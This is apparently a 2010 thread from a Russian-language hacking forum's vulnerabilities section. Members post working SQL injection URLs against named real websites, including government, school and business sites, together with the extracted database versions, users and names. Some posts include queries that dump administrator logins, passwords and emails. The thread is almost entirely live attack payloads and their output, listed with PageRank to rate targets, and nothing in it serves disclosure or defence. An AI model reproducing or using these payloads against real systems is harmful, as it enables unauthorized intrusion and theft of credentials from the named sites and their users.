ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #12301  
Старый 06.06.2010, 18:49
CyberHunter
Постоянный
Регистрация: 06.01.2010
Сообщений: 785
Провел на форуме:
1777031

Репутация: 256


Отправить сообщение для CyberHunter с помощью ICQ
По умолчанию

Код:
http://www.clanib.co.za/e107_plugins/advmedsys/advmedsys_view.php?det.1/*!%20and%200%20union%20select%201,2,3,concat_ws%280x3a,user%28%29,database%28%29,version%28%29%29%20from%20e107_user*/
Version: 5.0.90
User: nashie0_nashief@localhost
Database: nashie0_nashief

Код:
http://ab-league.windos2k.com/e107_plugins/advmedsys/advmedsys_view.php?det.1/*!%20and%200%20union%20select%201,2,3,concat_ws%280x3a,version%28%29,user%28%29,database%28%29%29%20from%20e107_user*/
Version: 4.1.22
User: windos2k@localhost
Database: windos2k_com_-_comp

Код:
http://www.secondocircolosarno.gov.it/2sarno/index.php?option=com_gcalendar&view=event&eventID=peler&start=memek&end=kentu&gcid=2+AND+1=2+UNION+SELECT+0,concat%28version%28%29,user%28%29,database%28%29%29,2,3,4+from+jos_users--
Version: 5.1.30-log
Database: secondocircsarno
User: secondocircsarno@62.149.215.59
PR: 2

Код:
http://www.waldorf-namibia.org/index.php?option=com_gcalendar&view=event&eventID=peler&start=memek&end=kentu&gcid=2+AND+1=2+UNION+SELECT+0,concat%28version%28%29,database%28%29,user%28%29%29,2,3,4+from+jos_users--
Version: 4.1.22-standard-log
Database: db201164
User: db201164@local
PR: 5
 
Ответить с цитированием

  #12302  
Старый 06.06.2010, 21:01
Konqi
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
Провел на форуме:
2101094

Репутация: 672


Отправить сообщение для Konqi с помощью ICQ
По умолчанию

http://www.sanmarinoforum.org/forum08/__download_forum08_rassegna.php?id=-91+union+select+concat(user(),version(),database() ,@@version_compile_os),2

PR-4
 
Ответить с цитированием

  #12303  
Старый 06.06.2010, 23:34
CyberHunter
Постоянный
Регистрация: 06.01.2010
Сообщений: 785
Провел на форуме:
1777031

Репутация: 256


Отправить сообщение для CyberHunter с помощью ICQ
По умолчанию

Код:
http://www.clkclan.com/e107_plugins/advmedsys/advmedsys_view.php?det.1/*!%20and%200%20union%20select%201,2,3,concat_ws%28user%28%29,database%28%29,version%28%29%29%20*/
Version: 5.1.30
User: clkclan_clkman@localhost
Database: clkclan_clk
 
Ответить с цитированием

  #12304  
Старый 07.06.2010, 03:38
qq6ka
Познающий
Регистрация: 21.05.2010
Сообщений: 37
Провел на форуме:
167126

Репутация: 55
По умолчанию

http://www.cricket-online.com/news.php?sid=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,concat_w s(0x2a,user(),version(),database()),14,15,16,17,18 ,19,20,21,22,23,24,25,26,27,28,29,30--


cricketo_cricket@localhost*5.0.51a-community-log*cricketo_nuke
 
Ответить с цитированием

  #12305  
Старый 07.06.2010, 10:52
aka_zver
Постоянный
Регистрация: 17.09.2009
Сообщений: 775
Провел на форуме:
3132379

Репутация: 1069


Отправить сообщение для aka_zver с помощью ICQ Отправить сообщение для aka_zver с помощью AIM Отправить сообщение для aka_zver с помощью MSN Отправить сообщение для aka_zver с помощью Yahoo
По умолчанию

Blind; select фильтруется.

http://www.zatopek.fr
+
http://www.zatopek.lu
+
http://www.zatopek.be
ТИЦ: 0
PR: 4
Код:
http://www.zatopek.fr(.be или .lu)/cms.php?id=30+and+substring(version(),1,1)=5--+
============================================

http://www.busicomsolutions.com.au
ТИЦ: 0
PR: 1
Код:
http://www.busicomsolutions.com.au/recruit/timesheets.php?cat_id=-1+union+select+1,concat_ws(0x0b,version(),user(),database(),@@version_compile_os),3,4,5--+

http://www.busicomsolutions.com.au/recruit/timesheets.php?cat_id=-1+union+select+1,group_concat(0x0b,admin_user,0x3a,admin_pass),3,4,5+from+tbl_admin--+
ver - 5.0.90-community
usr - vns_busicom@localhost
db - vns_busicomjob
os - pc-linux-gnu

============================================

http://www.bromleystone.co.uk
ТИЦ: 0
PR: 0
Код:
http://www.bromleystone.co.uk/cms.php?ID=1+union+select+1,2,concat_ws(0x0b,version(),user(),database(),@@version_compile_os),4,5,group_concat(0x0b,column_name),7+from+information_schema.columns+where+table_name=0x62726F6D6C65797461626C65--+
ver - 5.0.87-a2hosting-percona
usr - bromley_bromley@localhost
db - bromley_bromleystone
os - unknown-linux-gnu

============================================

http://www.autobusnigeria.com
ТИЦ: 0
PR: 0
Код:
http://www.autobusnigeria.com/cms.php?ID=-4+union+select+1,concat_ws(0x0b,version(),user(),database(),@@version_compile_os),3--+
ver - 4.1.22-standard
usr - autobusn_autobus@localhost
db - autobusn_autobus
os - pc-linux-gnu

============================================

http://www.kumardirect.com
ТИЦ: 0
PR: 0
Код:
http://www.kumardirect.com/cms.php?id=-2+union+select+1,2,3,concat_ws(0x0b,version(),user(),database(),@@version_compile_os),group_concat(0x0b,login_id,0x3a,password,0x3a,email),6,7,8,9+from+sysadmin--+
ver - 5.0.77-log
usr - kumardirect@217.194.210.50
db - kumardirect
os - redhat-linux-gnu
 
Ответить с цитированием

  #12306  
Старый 07.06.2010, 17:42
<Cyber-punk>
Участник форума
Регистрация: 01.10.2009
Сообщений: 105
Провел на форуме:
559542

Репутация: 94
Отправить сообщение для <Cyber-punk> с помощью ICQ
По умолчанию

Target: http://www.ac-psych.org/

User: acp_ac-psych@81.2.203.24
(http://www.ac-psych.org/?id=11111%20union%20select%20system_user%28%29)

Database: acpsych_ac-psych

(http://www.ac-psych.org/?id=111%20union%20select%20database%28%29)

Version: 5.0.33-log
(http://www.ac-psych.org/?id=111%20union%20select%20version%28%29)

Или всё вместе:
http://www.ac-psych.org/?id=-1%20union%20select%20concat_ws(0x0b,version(),user %20%20(),database(),@@version_compile_os)

PR-6

Последний раз редактировалось <Cyber-punk>; 08.06.2010 в 11:57..
 
Ответить с цитированием

  #12307  
Старый 07.06.2010, 18:36
Konqi
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
Провел на форуме:
2101094

Репутация: 672


Отправить сообщение для Konqi с помощью ICQ
По умолчанию

http://www.educacionbc.edu.mx/publicaciones/SintesisEv/Sintesis.php?Num=242+union+select+1,2,3,4,5,6+from +"table"

PR-5

ms_access
 
Ответить с цитированием

  #12308  
Старый 07.06.2010, 20:08
<Cyber-punk>
Участник форума
Регистрация: 01.10.2009
Сообщений: 105
Провел на форуме:
559542

Репутация: 94
Отправить сообщение для <Cyber-punk> с помощью ICQ
По умолчанию

Target: http://dir.kedah.gov.my/

User: root@localhost

Database: berita

Version: 5.0.77

OS: redhat-linux-gnu

PR-5

Код:
http://dir.kedah.gov.my/info.php?id=-1+union+select+0,1,2,3,4,concat_ws(0x0b,version(),user(),database(),@@version_compile_os)

Последний раз редактировалось <Cyber-punk>; 08.06.2010 в 11:53..
 
Ответить с цитированием

  #12309  
Старый 08.06.2010, 03:56
qq6ka
Познающий
Регистрация: 21.05.2010
Сообщений: 37
Провел на форуме:
167126

Репутация: 55
По умолчанию

http://www.10ballov.ru/view_kont.php?sid=91&pid=-1+union+select+1,2,3,4,concat_ws(0x2a,user,pass,si te),6,7,8,9,10,11,12,13,14,15+FROM+admin_users+lim it+0,1--
 
Ответить с цитированием

  #12310  
Старый 08.06.2010, 10:14
ZARO
Познающий
Регистрация: 17.04.2009
Сообщений: 59
Провел на форуме:
401944

Репутация: 37
Отправить сообщение для ZARO с помощью ICQ
По умолчанию

http://www.mp3style.ru/player.php?group_id=23&id=-451+'+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,concat_ws( 0x3a,version(),user(),database()),12,13,14,15,16,1 7,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33, 34,35,36,37,38,39,40,41,42,43,44,45,46+--+

5 ветка
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
SQL инъекция и Oracle, часть 2 k00p3r Чужие Статьи 0 13.06.2005 11:24
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ